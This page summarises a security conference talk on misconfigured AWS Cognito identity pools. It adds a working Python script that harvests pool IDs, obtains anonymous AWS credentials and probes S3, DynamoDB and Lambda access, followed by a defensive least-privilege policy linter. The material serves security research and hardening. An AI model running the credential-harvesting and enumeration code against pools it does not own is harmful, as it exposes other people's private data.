Internet-Scale Analysis of AWS Cognito Security

Conference:  BlackHat USA 2019



This presentation covers the common misconfigurations and security issues in AWS Cognito identity pools and how an attacker exploits them.
  • AWS Cognito is commonly misconfigured: developers attach IAM policies to the pool's unauthenticated and authenticated roles that grant far more than the application needs
  • By exploiting these misconfigurations the speaker gained access to sensitive resources, including S3 buckets that are not publicly exposed, DynamoDB tables and Lambda functions
  • CC Lambda and Common Crawl can be used to extract identity pool IDs from the internet at scale
  • Once an identity pool hands out temporary credentials, the role's effective permissions can be enumerated by brute-forcing API calls
  • Developers should follow the principle of least privilege and implement object-level permissions, scoping each identity to its own data
The speaker also found 280 hardcoded AWS credentials on the internet, almost 10% of them root account credentials, which carry unrestricted privileges. 38 of these were found in Common Crawl data, which attackers can mine just as easily. All findings were reported to the AWS security team.
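The two steps the summary describes, recovering identity pool IDs from harvested text and turning one into anonymous AWS credentials, are shown below as an added example. This is not the speaker's tooling (CC Lambda or the APK pipeline); it is illustrative code written for this page. The sample strings are constructed to look like a decompiled APK and a crawled JavaScript bundle, and the network-facing functions are only exercised when the file is run as a script, since they need boto3 and reachable AWS endpoints.

```python
"""
Added example (not the talk's own tooling): extract AWS Cognito identity pool
IDs from arbitrary text and trade one for unauthenticated-role credentials.
"""
import re

# An identity pool ID is "<region>:<uuid4>". The version nibble of a UUID4 is
# always 4 and the variant nibble is one of 8, 9, a, b; matching on that keeps
# random hex strings and other UUID versions out of the results.
POOL_ID_RE = re.compile(
    r"\b([a-z]{2}(?:-gov)?-[a-z]+-\d)"                 # AWS region, e.g. us-east-1
    r":"
    r"([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-4[0-9a-fA-F]{3}"  # UUID4 version nibble
    r"-[89abAB][0-9a-fA-F]{3}-[0-9a-fA-F]{12})\b"      # UUID4 variant nibble
)

# Constructed sample input: one ID repeated, one upper-case, one non-UUID4 decoy.
SAMPLE_STRINGS = """
const poolId = "us-east-1:5c6f1f4e-9c3a-4b2d-8e1f-3a7b6c9d0e12";
identityPoolId: 'eu-west-2:A1B2C3D4-E5F6-4A7B-9C8D-0E1F2A3B4C5D',
decoy: 'us-east-1:5c6f1f4e-9c3a-1b2d-8e1f-3a7b6c9d0e12'
again: us-east-1:5c6f1f4e-9c3a-4b2d-8e1f-3a7b6c9d0e12
"""


def extract_pool_ids(text):
    """Return de-duplicated, normalised identity pool IDs in first-seen order."""
    seen, found = set(), []
    for match in POOL_ID_RE.finditer(text):
        pool_id = f"{match.group(1)}:{match.group(2).lower()}"
        if pool_id not in seen:
            seen.add(pool_id)
            found.append(pool_id)
    return found


def region_of(pool_id):
    """The region is the part before the colon; Cognito calls must go there."""
    return pool_id.split(":", 1)[0]


def unauthenticated_credentials(pool_id):
    """
    GetId and GetCredentialsForIdentity are unsigned by design: this is exactly
    what an anonymous app user does, so no AWS credentials are needed to call them.
    Imports are lazy so the extractor above works without boto3 installed.
    """
    import boto3
    from botocore import UNSIGNED
    from botocore.config import Config

    client = boto3.client("cognito-identity", region_name=region_of(pool_id),
                          config=Config(signature_version=UNSIGNED))
    identity_id = client.get_id(IdentityPoolId=pool_id)["IdentityId"]
    creds = client.get_credentials_for_identity(IdentityId=identity_id)["Credentials"]
    return {"aws_access_key_id": creds["AccessKeyId"],
            "aws_secret_access_key": creds["SecretKey"],
            "aws_session_token": creds["SessionToken"]}


def probe_services(credentials, region):
    """
    Coarse permission brute-force: try one list call per service the talk
    mentions and record either the result or the error code. AccessDenied is
    as informative as a hit, since it confirms the role and its boundaries.
    """
    import boto3
    from botocore.exceptions import ClientError

    session = boto3.Session(region_name=region, **credentials)
    probes = {
        "s3:ListAllMyBuckets": lambda: [b["Name"] for b in session.client("s3").list_buckets()["Buckets"]],
        "dynamodb:ListTables": lambda: session.client("dynamodb").list_tables()["TableNames"],
        "lambda:ListFunctions": lambda: [f["FunctionName"] for f in session.client("lambda").list_functions()["Functions"]],
    }
    results = {}
    for action, call in probes.items():
        try:
            results[action] = call()
        except ClientError as err:
            results[action] = err.response["Error"]["Code"]
    return results


if __name__ == "__main__":
    for pool_id in extract_pool_ids(SAMPLE_STRINGS):
        print("identity pool:", pool_id)
        try:
            creds = unauthenticated_credentials(pool_id)
            print(probe_services(creds, region_of(pool_id)))
        except Exception as err:  # no unauth role, pool gone, or no network
            print("  no unauthenticated credentials:", err)
```

Only test a pool you own or are authorised to assess; the sample IDs are made up and will not resolve. The version-nibble check in the regex is deliberately strict because the talk states the IDs are UUID4; loosen it if you find a pool whose ID does not fit that pattern.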


This talk will show the results of an internet-scale analysis of the security of AWS Cognito configurations. During this research it was possible to identify 2,500 identity pools, which were used to gain access to more than 13,000 S3 buckets (which are not publicly exposed), 1,200 DynamoDB tables and 1,500 Lambda functions.

The talk starts with an introduction to the AWS Cognito service and how developers can configure it to give end users direct access to AWS resources such as S3 and DynamoDB. That access is restricted only by IAM policies which are under the developer's control and, in many cases, do not follow the least privilege principle.

The configuration weakness is first explained step by step for a specific AWS account and Cognito identity pool using a series of demos; the same concepts are then automated to perform an internet-scale analysis of AWS Cognito configurations.

Because Cognito identity pool IDs are UUID4 values and cannot be guessed, it was necessary to download thousands of APKs from the Google Play store, decompile them, and extract the identifiers. Other sources such as Common Crawl were also used to identify valid identifiers. The tools used to perform these tasks will be made public.

Each Cognito identity pool that was configured with an unauthenticated role was analyzed using an in-depth permission brute-force tool that identifies potential breaches of the least privilege principle.

The talk ends with recommendations for developers who want to configure the service securely, and an analysis of potential reasons for this widespread issue, such as poor documentation and examples on the AWS site.
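The recommendations at the end of the abstract, least privilege and object-level permissions for the unauthenticated role, are shown concretely below as an added example that is not part of the talk. It puts the kind of over-broad policy the talk attributes to copied documentation examples beside a scoped one, and runs a small linter over both. The scoping relies on two real IAM features: the `${cognito-identity.amazonaws.com:sub}` policy variable, which expands to the caller's Cognito identity ID, and the `dynamodb:LeadingKeys` condition key. The bucket name, table name and account ID are placeholders.

```python
"""
Added example (not from the talk): an over-permissive Cognito unauthenticated
role policy next to a least-privilege one, and a linter that flags the
patterns the talk's permission brute-force would have found.
"""
import json

IDENTITY_VAR = "${cognito-identity.amazonaws.com:sub}"

# Actions that let an anonymous caller map out the account instead of touching
# only its own objects. Stored lower-case because IAM action names are case-insensitive.
ENUMERATION_ACTIONS = {
    "s3:listallmybuckets", "s3:listbucket",
    "dynamodb:listtables", "lambda:listfunctions",
}

# The shape of policy the talk describes: wildcards copied from examples.
OVERLY_PERMISSIVE_UNAUTH_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:*"], "Resource": "*"},
        {"Effect": "Allow", "Action": ["dynamodb:*"], "Resource": "*"},
        {"Effect": "Allow", "Action": ["lambda:InvokeFunction", "lambda:ListFunctions"], "Resource": "*"},
    ],
}

# Object-level permissions: every identity is confined to its own S3 prefix and
# its own DynamoDB partition key. Names and account ID (123456789012) are placeholders.
LEAST_PRIVILEGE_UNAUTH_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["s3:GetObject", "s3:PutObject"],
            "Resource": f"arn:aws:s3:::example-app-uploads/{IDENTITY_VAR}/*",
        },
        {
            "Effect": "Allow",
            "Action": ["dynamodb:GetItem", "dynamodb:PutItem", "dynamodb:Query"],
            "Resource": "arn:aws:dynamodb:us-east-1:123456789012:table/ExampleAppData",
            "Condition": {
                "ForAllValues:StringEquals": {"dynamodb:LeadingKeys": [IDENTITY_VAR]}
            },
        },
    ],
}


def _as_list(value):
    """IAM allows a string or a list in Action/Resource; normalise to a list."""
    return value if isinstance(value, list) else [value]


def check_unauth_policy(policy):
    """
    Return (statement_index, message) findings for an unauthenticated-role policy.
    A statement passes only if it names no wildcard actions, grants no
    enumeration actions, and is tied to the caller's identity either in the
    resource ARN or in a Condition.
    """
    findings = []
    for idx, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        actions = [a.lower() for a in _as_list(stmt.get("Action", []))]
        resources = _as_list(stmt.get("Resource", []))
        scoped = (any(IDENTITY_VAR in r for r in resources)
                  or IDENTITY_VAR in json.dumps(stmt.get("Condition", {})))
        for action in actions:
            if action.endswith("*"):
                findings.append((idx, f"wildcard action '{action}'"))
            elif action in ENUMERATION_ACTIONS:
                findings.append((idx, f"enumeration action '{action}' lets anonymous users map your resources"))
        if "*" in resources:
            findings.append((idx, "Resource '*' spans every bucket, table and function in the account"))
        elif not scoped:
            findings.append((idx, f"resource not scoped to the caller via {IDENTITY_VAR}"))
    return findings


if __name__ == "__main__":
    for name, policy in [("overly permissive", OVERLY_PERMISSIVE_UNAUTH_POLICY),
                         ("least privilege", LEAST_PRIVILEGE_UNAUTH_POLICY)]:
        print(f"{name}: {len(check_unauth_policy(policy))} finding(s)")
        for idx, msg in check_unauth_policy(policy):
            print(f"  statement {idx}: {msg}")
```

The linter is a heuristic, not a substitute for IAM Access Analyzer or a real simulation of the policy; its value is that it encodes the three things the talk's brute-force tool turned into breaches (wildcard actions, wildcard resources, and data access not tied to the identity) so they can be caught before the pool is deployed.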